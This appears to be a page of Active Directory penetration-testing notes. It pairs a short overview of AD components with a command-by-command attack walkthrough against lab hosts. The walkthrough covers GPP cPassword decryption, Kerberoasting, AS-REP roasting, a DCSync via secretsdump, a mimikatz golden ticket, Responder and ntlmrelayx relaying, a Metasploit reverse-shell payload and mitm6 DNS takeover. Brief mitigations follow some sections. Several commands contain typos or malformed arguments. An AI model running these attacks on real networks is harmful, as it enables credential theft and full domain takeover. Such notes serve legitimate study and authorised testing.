Basic AD Pentesting

AD Components

Domain Controller

  • Server with AD DS server role.

  • Hosts a copy of the AD DS directory store.

  • Provides authentication and authorization services.

  • Replicates updates to other domain controllers.

  • Allows administrative access to manage resources.

AD DS Data Store

  • Consists of the Ntds.dit file (password hashes, sensitive information).

  • Stored in the %SystemRoot%\NTDS folder on all domain controllers.

AD Logical Components

  • Schema:

    • Defines objects that can be stored in the directory.

    • Enforces rules about object creation and configuration.

  • Domains:

    • Group and manage objects in an organization.

    • May include child domains and trusts with other domains.

  • Trees:

    • Hierarchy of domains in AD DS.

    • Can have child domains.

    • Creates two-way transitive trust with other domains.

  • Forests:

    • Collection of Trees.

    • Shares common schema and configuration.

    • Enables trusts between domains in the forest.

    • Shares enterprise admin, schema admins groups.

  • Organizational Units (OUs):

    • Containers that can contain users, groups, computers, and other OUs.

  • Trusts:

    • Provide mechanisms for users to gain access.

  • Objects:

    • Users, contacts, groups, computers, printers, shared folders, etc.

Initial Attack Vectors

  • Begin with mitm6 or Responder.

  • Run a scan to generate traffic.

  • Look for default credentials on web logins.

  • Target websites in scope (http_version).

  • Consider printers, Jenkins, etc.

  • Think outside the box.

Additional Resources:

Enumeration

Kerberos Enumeration

  1. Nmap Scan:

    nmap -T5 10.10.10.100

  2. SMB Enumeration:

    smbclient -L \\\\10.10.10.100\\

  3. Replication:

    smbclient \\\\10.10.10.100\\Replication

    • In the Replication directory, look for Groups.xml file.

  4. Extracting cPassword:

    • Copy the cPassword attribute from Groups.xml.

    • Use gpp-decrypt to decrypt the password:

      gpp-decrypt <cpassword>

  5. Psexec.py with Hash:

    psexec.py active.htp /svc_tags:<cpassword>@10.10.10.100

  6. Kerberoasting with GetUserSPNs.py:

    python3 GetUserSPNs.py limbawy.local/ahmed:Password -dc-ip 192.168.1.10 -request

    • Save the hash to TGS.txt.

    • Crack the hash using john:

      sudo john TGS.txt

  7. ASREPRoast with GetNPUsers.py:

    python3 GetNPUsers.py limbawy.local/levi -dc-ip 192.168.1.10

    • Save the hash to TGT.txt.

    • Crack the hash using john:

      sudo john TGT.txt

  8. BloodHound for Full Control:

    bloodhound-python -u Levi -p Password -ns 192.168.1.10 -d limbawy.local -c All

  9. DC Sync Attack with secretsdump.py:

    python3 secretsdump.py limbawy.local/Levi:Password@192.168.1.10 -use-vss

  10. Golden Ticket with mimikatz:

    mimikatz # kerberos:golden /domain:limbawy.local /sid:S-1-5-21-1314916712-2918817657-636196047 /user:Administrator:13dadc78472c366a7cd1cea42347af18 /krbtgt:b3a2e1bb5cb5e94a27f1884d86bca6c2 /ptt

LMNR

  • LMNR (Link-Local Multicast Name Resolution) Attack Workflow:

    1. Use responder:

      responder -I tun0 -rdw

    2. Wait for events.

    3. Retrieve hashes.

    4. Crack hashes using hashcat:

      hashcat -m 5600 hashes.txt rockyou.txt

  • Defense:

    • Disable LMNR and NBT-NS.

    • Enforce strong user passwords.

SMB

  1. Identify SMB Signing:

    nmap --script=smb2-security-mode.nse -p 445 192.168.57.0/24

  2. SMB Relay Attack Workflow:

    • Edit responder.conf to turn off SMB and HTTP.

    • Run responder:

      responder -I eth0 -rdw -w

    • Run ntlmrelayx.py:

      ntlmrelayx.py -tf targets.txt -smb2support

  3. Gaining a Shell using MSF:

    msfconsole
search psexec
set rhost target_ip
set smbdomain <domain_here>
set smpass <password_u_cracked_here>
set payload windows/x64/meterpreter/reverse_tcp
set lhost eth0
run

  4. Other Ways to Psexec:

    psexec.py marvel.local/fcastle:password1:@192.168.57.141
smbexec.py marvel.local/fcastle:password1:@192.168.57.141
wmiexec.py marvel.local/fcastle:password1:@192.168.57.141

  • Mitigation:

    • Enable SMB Signing.

    • Disable NTLM authentication.

    • Implement account tiering.

    • Restrict local admin access.

IPv6 Attacks

  1. Install mitm6:

    pip3 install mitm6

  2. Setup LDAP for DNS Takeover:

    • Go to Server Manager.

    • Add the AD Cert Services feature.

  3. DNS Takeover via mitm6 Workflow:

    mitm6 -d marvel.local

  4. Delegate Impersonation Attack with ntlnrelayx.py:

    ntlmrelayx.py -t ldaps://192.168.57.140 -wh fakewpad.marvel.local -l lootme

  • Mitigation:

    • Disable IPv6.

    • Disable WPAD.

    • Enable LDAP signing.

    • Consider administrative users in the protected users group.

Passback Attack

PreviousActive DirectoryNextDesktop AppSec

Last updated